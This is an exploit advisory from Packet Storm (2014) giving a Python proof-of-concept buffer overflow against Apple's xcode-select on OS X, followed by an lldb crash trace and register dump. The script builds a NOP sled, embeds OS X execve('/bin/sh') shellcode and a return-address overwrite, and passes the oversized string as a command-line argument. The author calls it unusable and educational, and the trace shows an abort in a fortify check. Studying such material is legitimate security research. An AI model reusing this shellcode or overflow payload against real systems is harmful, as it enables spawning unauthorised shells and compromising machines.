xcode-select 13.4.0 Buffer Overflow

2014-09-23T00:00:00
ID PACKETSTORM:128349
Type packetstorm
Reporter Juan Sacco
Modified 2014-09-23T00:00:00

Description

```python
# Exploit Title: xcode-select - buffer overflow
# Description: xcode-select controls the location of the developer
# directory used by xcrun(1), xcodebuild(1), cc(1), and other Xcode and BSD
# development tools.
# Date: Tuesday 23 2014
# Exploit Author: Juan Sacco
# Vendor Homepage: https://developer.apple.com
# Software Link: https://developer.apple.com/xcode/
# Version: 2333
# Tested on: 13.4.0 Darwin Kernel Version 13.4.0
# CVE : None

import errno
import subprocess

junk = "\x90"*5631
# OSX/x86 intel - execve(/bin/sh) - 24 bytes
shellcode = "\x31\xc0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x50\x53\xB0\x3B\x6A\x2A\xCD\x80"

buffer = "\x90\x90\x90\x90"*89
eip = "\x7f\xff\x8e\x19\x98\x66"

print "# xcode-select is prone to an overflow"
print "# Wasting CPU clocks on unusable exploits"
print "# This exploit is for educational purposes"

# The oversized string is handed to xcode-select as a single argument;
# the lldb session below shows the resulting abort inside __strlcat_chk.
try:
    subprocess.call(["xcode-select", junk+shellcode+buffer+eip])
except OSError as e:
    if e.errno == errno.ENOENT:
        print "xcode-select not found!"
    else:
        print "Error executing exploit"
        raise
```
```
Process 5932 launched: '/usr/bin/xcode-select' (x86_64)
Process 5932 stopped
* thread #1: tid = 0x8358c, 0x00007fff8e199866
libsystem_kernel.dylib`__pthread_kill + 10, queue =
'com.apple.main-thread', stop reason = signal SIGABRT
frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8e199866: jae 0x7fff8e199870 ; __pthread_kill + 20
0x7fff8e199868: movq %rax, %rdi
0x7fff8e19986b: jmpq 0x7fff8e196175 ; cerror_nocancel
0x7fff8e199870: ret
(lldb)

(lldb) bt
* thread #1: tid = 0x8358c, 0x00007fff8e199866
libsystem_kernel.dylib`__pthread_kill + 10, queue =
'com.apple.main-thread', stop reason = signal SIGABRT
* frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
frame #1: 0x00007fff91b8a35c libsystem_pthread.dylib`pthread_kill + 92
frame #2: 0x00007fff8a0a7b1a libsystem_c.dylib`abort + 125
frame #3: 0x00007fff8a0a7c91 libsystem_c.dylib`abort_report_np + 181
frame #4: 0x00007fff8a0cb860 libsystem_c.dylib`__chk_fail + 48
frame #5: 0x00007fff8a0cb870 libsystem_c.dylib`__chk_fail_overlap + 16
frame #6: 0x00007fff8a0cb892 libsystem_c.dylib`__chk_overlap + 34
frame #7: 0x00007fff8a0cb795 libsystem_c.dylib`__strlcat_chk + 157
frame #8: 0x0000000100006315
libxcselect.dylib`xcselect_find_developer_contents_from_path + 116
frame #9: 0x0000000100000e75
xcode-select`___lldb_unnamed_function3$$xcode-select + 57
frame #10: 0x0000000100001562
xcode-select`___lldb_unnamed_function5$$xcode-select + 1083a

(lldb) register r -a
General Purpose Registers:
rax = 0x0000000000000000
rbx = 0x00007fff769df310 libsystem_pthread.dylib`_thread
rcx = 0x00007fff5fbfce18
rdx = 0x0000000000000000
rdi = 0x0000000000000d0b
rsi = 0x0000000000000006
rbp = 0x00007fff5fbfce40
rsp = 0x00007fff5fbfce18
r8 = 0x00000000fffffc00
r9 = 0x00007fff5fbfce00
r10 = 0x0000000008000000
r11 = 0x0000000000000206
r12 = 0x0000000000000400
r13 = 0x000000000000000e
r14 = 0x0000000000000006
r15 = 0x00007fff5fbfd120
rip = 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
rflags = 0x0000000000000206
cs = 0x0000000000000007
fs = 0x0000000000000000
gs = 0x0000000000030000
eax = 0x00000000
ebx = 0x769df310
ecx = 0x5fbfce18
edx = 0x00000000
edi = 0x00000d0b
esi = 0x00000006
ebp = 0x5fbfce40
esp = 0x5fbfce18
r8d = 0xfffffc00
r9d = 0x5fbfce00
r10d = 0x08000000
r11d = 0x00000206
r12d = 0x00000400
r13d = 0x0000000e
r14d = 0x00000006
r15d = 0x5fbfd120
```